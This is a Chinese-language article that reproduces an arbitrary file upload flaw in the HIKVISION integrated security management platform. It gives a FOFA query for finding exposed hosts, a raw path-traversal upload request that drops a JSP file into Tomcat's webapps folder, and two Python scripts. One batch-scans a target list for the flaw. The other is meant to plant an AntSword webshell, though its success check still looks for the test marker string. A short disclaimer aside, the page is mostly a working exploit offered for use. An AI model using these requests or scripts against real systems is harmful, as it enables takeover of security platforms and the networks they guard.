推广 热搜： 采购方式滤芯甲带气动隔膜泵减速机减速机型号带式称重给煤机履带无级变速机链式给煤机

HiKVISION综合安防管理平台任意文件上传漏洞复现(附poc和exp)

日期：2023-09-12 07:13:24 来源：网络整理作者：本站编辑评论：0

申明：本文仅供技术学习参考使用，请勿用作违法用途，否则后果自负。

一、漏洞名称

HiKVISION综合安防管理平台任意文件上传漏洞

二、漏洞影响

HiKVISION综合安防管理平台

三、漏洞描述

HiKVISION综合安防管理平台 /center/api/files;.js 接口存在任意文件上传漏洞，攻击者可以通过漏洞上传木马到服务器中，获得webshell。

四、资产FOFA搜索语句

app="HIKVISION-综合安防管理平台"

五、漏洞复现

向目标发送如下请求数据包，其中字符串ndbmaabfueriigbjadss12345是上传的jsp文件的内容

POST /center/api/files;.js HTTP/1.1Host: xx.xx.xx.xx:1443Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
------WebKitFormBoundaryxxmdzwoeContent-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp"Content-Type:image/jpeg
<%out.println("pboyjnnrfipmplsukdeczudsefxmywex");%>------WebKitFormBoundaryxxmdzwoe--

收到响应数据包如下，其中path字段表示文件访问路径

HTTP/1.1 200 Cache-Control: no-cache, no-store, must-revalidatePragma: no-cacheContent-Type: application/json;charset=UTF-8Content-Length: 337Set-Cookie: JSESSIONID=73715E162ED9A0675D10A1644EEB3F12; Path=/center; HttpOnly;secureContent-Language: zh_CNExpires: 0Content-Disposition: inline;filename=f.txtDate: Mon, 11 Sep 2023 02:26:26 GMT
{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp","link":"http://192.168.240.1:8001/download1/center_faq/resource/5dab28a3-485a-4928-b358-0c73d3f2c40a/../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp","id":"5dab28a3-485a-4928-b358-0c73d3f2c40a"},"msg":""}

然后请求如下路径查看上传的文件

https://xx.xx.xx.xx:1443/clusterMgr/ukgmfyufsi.jsp;.js

看到页面内容是我们写入的字符串

证明存在该漏洞

六、漏洞验证poc

该python脚本可以批量检测漏洞，C:\Users\DELL\Desktop\1004.txt为输入目标文件，每行是一个url

import argparseimport timeimport requests
def get_url(file):    with open('{}'.format(file),'r',encoding='utf-8') as f:        for i in f:            i = i.replace('\n', '')            send_req(i)
def write_result(content):    f = open("result.txt", "a", encoding="UTF-8")    f.write('{}\n'.format(content))    f.close()

def send_req(url_check):    print('{} runing Check'.format(url_check))    url = url_check + '/center/api/files;.js'    header = {        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',        'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoe'    }    data = (        "------WebKitFormBoundaryxxmdzwoe\r\n"        'Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi1.jsp"\r\n'        'Content-Type:image/jpeg\r\n'        "\r\n"        '<%out.println("pboyjnnrfipmplsukdeczudsefxmywex");%>\r\n'        "------WebKitFormBoundaryxxmdzwoe--\r\n"    )        try:        requests.packages.urllib3.disable_warnings()        response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)                url2 = "{}/clusterMgr/ukgmfyufsi1.jsp;.js".format(url_check)        res2 = requests.get(url2, verify=False)        if response.status_code == 200 and res2.status_code == 200 and "pboyjnnrfipmplsukdeczudsefxmywex" in res2.text:            result = '{} 存在任意文件上传漏洞! 请访问目标自测：{} \n'.format(url_check,url2)            print(result)            write_result(result)        time.sleep(1)    except Exception as e:        pass
if __name__ == '__main__':    file = r"C:\Users\DELL\Desktop\1004.txt"    get_url(file)

七、漏洞利用exp

使用蚁剑生成木马，复制文本赋值给payload变量，运行脚本即可获得webshell

import argparseimport timeimport requests
def get_url(file):    with open('{}'.format(file),'r',encoding='utf-8') as f:        for i in f:            i = i.replace('\n', '')            send_req(i)
def write_result(content):    f = open("result.txt", "a", encoding="UTF-8")    f.write('{}\n'.format(content))    f.close()

def send_req(url_check):    print('{} runing Check'.format(url_check))    url = url_check + '/center/api/files;.js'    header = {        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',        'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoe'    }    payload = ""# 木马文件内容    data = (        "------WebKitFormBoundaryxxmdzwoe\r\n"        'Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi1.jsp"\r\n'        'Content-Type:image/jpeg\r\n'        "\r\n"        '<%out.println("{}");%>\r\n'        "------WebKitFormBoundaryxxmdzwoe--\r\n"    ).format(payload)        try:        requests.packages.urllib3.disable_warnings()        response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)                url2 = "{}/clusterMgr/ukgmfyufsi1.jsp;.js".format(url_check)        res2 = requests.get(url2, verify=False)        if response.status_code == 200 and res2.status_code == 200 and "pboyjnnrfipmplsukdeczudsefxmywex" in res2.text:            result = '{} webshell上传成功! url：{}  密码：mypasswd\n'.format(url_check,url2)            print(result)            write_result(result)        time.sleep(1)    except Exception as e:        pass
if __name__ == '__main__':    file = r"C:\Users\DELL\Desktop\1004.txt"    get_url(file)

打赏

更多>同类资讯

0 条相关评论

推荐图文

推荐资讯

点击排行